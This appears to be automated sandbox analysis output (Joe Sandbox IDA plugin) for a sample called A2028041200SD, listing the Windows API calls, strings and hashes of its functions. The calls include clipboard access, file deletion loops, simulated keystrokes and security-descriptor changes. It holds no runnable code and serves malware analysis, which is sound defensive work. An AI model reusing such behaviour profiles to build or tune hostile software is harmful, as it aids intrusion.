                                                                        • Instruction ID: fa1f94e7145c4daad4be8b5364bf415925711f163761751668b7416dabda3708
                                                                        • Opcode Fuzzy Hash: ddb6f89f0a246e00f2be5ebe4e4aff12c53aeeddfed6a80279522ec79a5bbb14
                                                                        • Instruction Fuzzy Hash: D032E071609345EFDB10CF24C894BAABBB8FF49364F140A29FA99872A1D731DC48DB51
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0095B1CD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: %d/%02d/%02d
                                                                        • API String ID: 3850602802-328681919
                                                                        • Opcode ID: 70f8ceb18be7c21d5948ba78f664d0acd59d0be334055d427859f91b7bc56f69
                                                                        • Instruction ID: 92052f90994aa2674a0440e807a0677d0f4b6bdc50f71af11d8ff50f4e45c3f3
                                                                        • Opcode Fuzzy Hash: 70f8ceb18be7c21d5948ba78f664d0acd59d0be334055d427859f91b7bc56f69
                                                                        • Instruction Fuzzy Hash: 9C12CC71604208AFEB24DF6ACC59FAA7BB8FF85321F104219FD19EA2D0DB748945CB51
                                                                        APIs
                                                                        • GetForegroundWindow.USER32(00000000,00000000), ref: 0090EB4A
                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00963AEA
                                                                        • IsIconic.USER32(000000FF), ref: 00963AF3
                                                                        • ShowWindow.USER32(000000FF,00000009), ref: 00963B00
                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00963B0A
                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00963B20
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00963B27
                                                                        • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00963B33
                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00963B44
                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00963B4C
                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 00963B54
                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00963B57
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00963B6C
                                                                        • keybd_event.USER32(00000012,00000000), ref: 00963B77
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00963B81
                                                                        • keybd_event.USER32(00000012,00000000), ref: 00963B86
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00963B8F
                                                                        • keybd_event.USER32(00000012,00000000), ref: 00963B94
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00963B9E
                                                                        • keybd_event.USER32(00000012,00000000), ref: 00963BA3
                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00963BA6
                                                                        • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00963BCD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                        • String ID: Shell_TrayWnd
                                                                        • API String ID: 4125248594-2988720461
                                                                        • Opcode ID: a7f524e8100a73c12b262d257093eba3bbb32ee593fef71330275a2b285b1067
                                                                        • Instruction ID: a2a3de324d802e2f267f9a5200768fae0530aa9edb8bffe6a99ea8df63a3a94f
                                                                        • Opcode Fuzzy Hash: a7f524e8100a73c12b262d257093eba3bbb32ee593fef71330275a2b285b1067
                                                                        • Instruction Fuzzy Hash: 45317472A542187BEB206BB59C49F7F7E7CEF44B50F108025FA09EA1D0DAB15D40BAA0
                                                                        APIs
                                                                          • Part of subcall function 00936EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00935FA6,?), ref: 00936ED8
                                                                          • Part of subcall function 00936EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00935FA6,?), ref: 00936EF1
                                                                          • Part of subcall function 0093725E: __wsplitpath.LIBCMT ref: 0093727B
                                                                          • Part of subcall function 0093725E: __wsplitpath.LIBCMT ref: 0093728E
                                                                          • Part of subcall function 009372CB: GetFileAttributesW.KERNEL32(?,00936019), ref: 009372CC
                                                                        • _wcscat.LIBCMT ref: 00936149
                                                                        • _wcscat.LIBCMT ref: 00936167
                                                                        • __wsplitpath.LIBCMT ref: 0093618E
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 009361A4
                                                                        • _wcscpy.LIBCMT ref: 00936209
                                                                        • _wcscat.LIBCMT ref: 0093621C
                                                                        • _wcscat.LIBCMT ref: 0093622F
                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0093625D
                                                                        • DeleteFileW.KERNEL32(?), ref: 0093626E
                                                                        • MoveFileW.KERNEL32(?,?), ref: 00936289
                                                                        • MoveFileW.KERNEL32(?,?), ref: 00936298
                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 009362AD
                                                                        • DeleteFileW.KERNEL32(?), ref: 009362BE
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 009362E1
                                                                        • FindClose.KERNEL32(00000000), ref: 009362FD
                                                                        • FindClose.KERNEL32(00000000), ref: 0093630B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                        • String ID: \*.*$p1Mw`KNw
                                                                        • API String ID: 1917200108-2160596699
                                                                        • Opcode ID: b2ad1f9809a97286d2cfbef275941b58b0708b5d1c2a592f6b39e06dc420f672
                                                                        • Instruction ID: 477126f9bc6d1cd22883de11d1bcf66106ac08237b5674b199aae624c9293a74
                                                                        • Opcode Fuzzy Hash: b2ad1f9809a97286d2cfbef275941b58b0708b5d1c2a592f6b39e06dc420f672
                                                                        • Instruction Fuzzy Hash: 3F513F7290911C6ACB21EB91CC44EEFB7BCAF45300F0941E6E599E3141DF76A7898FA4
                                                                        APIs
                                                                        • OpenClipboard.USER32(0098DC00), ref: 00946B36
                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00946B44
                                                                        • GetClipboardData.USER32(0000000D), ref: 00946B4C
                                                                        • CloseClipboard.USER32 ref: 00946B58
                                                                        • GlobalLock.KERNEL32(00000000), ref: 00946B74
                                                                        • CloseClipboard.USER32 ref: 00946B7E
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00946B93
                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00946BA0
                                                                        • GetClipboardData.USER32(00000001), ref: 00946BA8
                                                                        • GlobalLock.KERNEL32(00000000), ref: 00946BB5
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00946BE9
                                                                        • CloseClipboard.USER32 ref: 00946CF6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                        • String ID:
                                                                        • API String ID: 3222323430-0
                                                                        • Opcode ID: 72cf1d8b1c5fa9b36c98b4aab7763071f06e656a1c99860c9cc1b431787b7650
                                                                        • Instruction ID: f5b98147e48241c3145087473fb8d5d6f752235cc7d4858d3d02b1c07f90bb53
                                                                        • Opcode Fuzzy Hash: 72cf1d8b1c5fa9b36c98b4aab7763071f06e656a1c99860c9cc1b431787b7650
                                                                        • Instruction Fuzzy Hash: ED51BEB2208205ABD300AF64CD86F7E77B8FF85B11F100429F69AD21E1EF60D9459B63
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0093F62B
                                                                        • FindClose.KERNEL32(00000000), ref: 0093F67F
                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0093F6A4
                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0093F6BB
                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0093F6E2
                                                                        • __swprintf.LIBCMT ref: 0093F72E
                                                                        • __swprintf.LIBCMT ref: 0093F767
                                                                        • __swprintf.LIBCMT ref: 0093F7BB
                                                                          • Part of subcall function 0091172B: __woutput_l.LIBCMT ref: 00911784
                                                                        • __swprintf.LIBCMT ref: 0093F809
                                                                        • __swprintf.LIBCMT ref: 0093F858
                                                                        • __swprintf.LIBCMT ref: 0093F8A7
                                                                        • __swprintf.LIBCMT ref: 0093F8F6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                        • API String ID: 835046349-2428617273
                                                                        • Opcode ID: fbf1c13b64ba287997bef63770daf5879ee92c6ff778924461cc6c46aa6af7eb
                                                                        • Instruction ID: d85819e95754869f05a317e46a84962def99a90c63e6ac6373b1cad040a8f20c
                                                                        • Opcode Fuzzy Hash: fbf1c13b64ba287997bef63770daf5879ee92c6ff778924461cc6c46aa6af7eb
                                                                        • Instruction Fuzzy Hash: 00A1F0B2508348ABC314EBA4C995EBFB7ECFF94704F440919F695C2191EB34DA49CB62
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 00941B50
                                                                        • _wcscmp.LIBCMT ref: 00941B65
                                                                        • _wcscmp.LIBCMT ref: 00941B7C
                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00941B8E
                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00941BA8
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00941BC0
                                                                        • FindClose.KERNEL32(00000000), ref: 00941BCB
                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00941BE7
                                                                        • _wcscmp.LIBCMT ref: 00941C0E
                                                                        • _wcscmp.LIBCMT ref: 00941C25
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00941C37
                                                                        • SetCurrentDirectoryW.KERNEL32(009A39FC), ref: 00941C55
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00941C5F
                                                                        • FindClose.KERNEL32(00000000), ref: 00941C6C
                                                                        • FindClose.KERNEL32(00000000), ref: 00941C7C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                        • String ID: *.*
                                                                        • API String ID: 1803514871-438819550
                                                                        • Opcode ID: 4835ff8c80bd66dd14f24250197c177666a3917e0c7bdf4fee091a35c26c38ce
                                                                        • Instruction ID: 71a270f8655031b37005dc4cb0b1beab0e2cf9645c3ebe65f33c32b8d614e261
                                                                        • Opcode Fuzzy Hash: 4835ff8c80bd66dd14f24250197c177666a3917e0c7bdf4fee091a35c26c38ce
                                                                        • Instruction Fuzzy Hash: 4731F332646219ABCF14AFA0DC89FDE73BC9F85325F104165F915E2090EB70DAC58A64
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 00941CAB
                                                                        • _wcscmp.LIBCMT ref: 00941CC0
                                                                        • _wcscmp.LIBCMT ref: 00941CD7
                                                                          • Part of subcall function 00936BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00936BEF
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00941D06
                                                                        • FindClose.KERNEL32(00000000), ref: 00941D11
                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00941D2D
                                                                        • _wcscmp.LIBCMT ref: 00941D54
                                                                        • _wcscmp.LIBCMT ref: 00941D6B
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00941D7D
                                                                        • SetCurrentDirectoryW.KERNEL32(009A39FC), ref: 00941D9B
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00941DA5
                                                                        • FindClose.KERNEL32(00000000), ref: 00941DB2
                                                                        • FindClose.KERNEL32(00000000), ref: 00941DC2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                        • String ID: *.*
                                                                        • API String ID: 1824444939-438819550
                                                                        • Opcode ID: 770f16c4ada855a07d6a193d688dc3af0665fde71e769e4257251cd60339fbe7
                                                                        • Instruction ID: e9e54e4611d08c7f366616d35b51e484edafcbc5c4fffe75b8e4fff455e6bbc3
                                                                        • Opcode Fuzzy Hash: 770f16c4ada855a07d6a193d688dc3af0665fde71e769e4257251cd60339fbe7
                                                                        • Instruction Fuzzy Hash: 8E312472A0661ABACF14AFA0DC49FDE77BD9F85324F104561F805A30D1EB30DAC58BA0
                                                                        APIs
                                                                        • GetLocalTime.KERNEL32(?), ref: 009409DF
                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 009409EF
                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 009409FB
                                                                        • __wsplitpath.LIBCMT ref: 00940A59
                                                                        • _wcscat.LIBCMT ref: 00940A71
                                                                        • _wcscat.LIBCMT ref: 00940A83
                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00940A98
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00940AAC
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00940ADE
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00940AFF
                                                                        • _wcscpy.LIBCMT ref: 00940B0B
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00940B4A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                        • String ID: *.*
                                                                        • API String ID: 3566783562-438819550
                                                                        • Opcode ID: a5e10997883698f56821f679804c8ef7e4978e595c1acb3a5fe6913667d9ba52
                                                                        • Instruction ID: 736dac7502b6e8ca4ec07b9dacbfb457d4da39e703faead4485b2378d5ee50e4
                                                                        • Opcode Fuzzy Hash: a5e10997883698f56821f679804c8ef7e4978e595c1acb3a5fe6913667d9ba52
                                                                        • Instruction Fuzzy Hash: B76147725083099FD710EF64C845EAEB3E8FFC9314F04891AEA99C7251DB35E945CB92
                                                                        APIs
                                                                          • Part of subcall function 0092ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0092ABD7
                                                                          • Part of subcall function 0092ABBB: GetLastError.KERNEL32(?,0092A69F,?,?,?), ref: 0092ABE1
                                                                          • Part of subcall function 0092ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0092A69F,?,?,?), ref: 0092ABF0
                                                                          • Part of subcall function 0092ABBB: HeapAlloc.KERNEL32(00000000,?,0092A69F,?,?,?), ref: 0092ABF7
                                                                          • Part of subcall function 0092ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0092AC0E
                                                                          • Part of subcall function 0092AC56: GetProcessHeap.KERNEL32(00000008,0092A6B5,00000000,00000000,?,0092A6B5,?), ref: 0092AC62
                                                                          • Part of subcall function 0092AC56: HeapAlloc.KERNEL32(00000000,?,0092A6B5,?), ref: 0092AC69
                                                                          • Part of subcall function 0092AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0092A6B5,?), ref: 0092AC7A
                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0092A6D0
                                                                        • _memset.LIBCMT ref: 0092A6E5
                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0092A704
                                                                        • GetLengthSid.ADVAPI32(?), ref: 0092A715
                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 0092A752
                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0092A76E
                                                                        • GetLengthSid.ADVAPI32(?), ref: 0092A78B
                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0092A79A
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0092A7A1
                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0092A7C2
                                                                        • CopySid.ADVAPI32(00000000), ref: 0092A7C9
                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0092A7FA
                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0092A820
                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0092A834
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                        • String ID:
                                                                        • API String ID: 3996160137-0
                                                                        • Opcode ID: 0228c70bd171e49077b3d60455076bb2ade9cf672fcae73a9a02a393d6ece1c5
                                                                        • Instruction ID: 8bc0c72a9c9a527cf76a8781655cca855f858ea2257100ba1b7802af7bc8fb17
                                                                        • Opcode Fuzzy Hash: 0228c70bd171e49077b3d60455076bb2ade9cf672fcae73a9a02a393d6ece1c5
                                                                        • Instruction Fuzzy Hash: FA516B72900219AFDF00DFA4EC44EEEBBB9FF44310F048129F915A72A0DB349A46DB61
                                                                        APIs
                                                                          • Part of subcall function 00936EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00935FA6,?), ref: 00936ED8
                                                                          • Part of subcall function 009372CB: GetFileAttributesW.KERNEL32(?,00936019), ref: 009372CC
                                                                        • _wcscat.LIBCMT ref: 00936441
                                                                        • __wsplitpath.LIBCMT ref: 0093645F
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00936474
                                                                        • _wcscpy.LIBCMT ref: 009364A3
                                                                        • _wcscat.LIBCMT ref: 009364B8
                                                                        • _wcscat.LIBCMT ref: 009364CA
                                                                        • DeleteFileW.KERNEL32(?), ref: 009364DA
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 009364EB
                                                                        • FindClose.KERNEL32(00000000), ref: 00936506
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                        • String ID: \*.*$p1Mw`KNw
                                                                        • API String ID: 2643075503-2160596699
                                                                        • Opcode ID: 4703dec5613a44dc327adf3c6de7f403704d842a1d2a0a4b5a191b22ba43a53f
                                                                        • Instruction ID: 70246ca6ba44d3c20d76aaa130732d98ede41a35bd55ce9deab713bf6d507b1b
                                                                        • Opcode Fuzzy Hash: 4703dec5613a44dc327adf3c6de7f403704d842a1d2a0a4b5a191b22ba43a53f
                                                                        • Instruction Fuzzy Hash: 1031B8B240C3486AC321DBA48885ADBB7ECAF95300F40492AF5D9C3141EB36D54DCBA7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                        • API String ID: 0-4052911093
                                                                        • Opcode ID: 880549d7bfdf1af2bbb1b27f39f532a913da597072ad40b932acd73ed20b5fc0
                                                                        • Instruction ID: 035e186da94af512e036b49014190725fcaff8cfa585013e63ffcb9208b709dd
                                                                        • Opcode Fuzzy Hash: 880549d7bfdf1af2bbb1b27f39f532a913da597072ad40b932acd73ed20b5fc0
                                                                        • Instruction Fuzzy Hash: 7E726172E14219DBDB24CF68C8407BEB7B5FF54310F14816AE949EB280EB749E41DB94
                                                                        APIs
                                                                          • Part of subcall function 00953C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00952BB5,?,?), ref: 00953C1D
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0095328E
                                                                          • Part of subcall function 008F936C: __swprintf.LIBCMT ref: 008F93AB
                                                                          • Part of subcall function 008F936C: __itow.LIBCMT ref: 008F93DF
                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0095332D
                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 009533C5
                                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00953604
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00953611
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                        • String ID:
                                                                        • API String ID: 1240663315-0
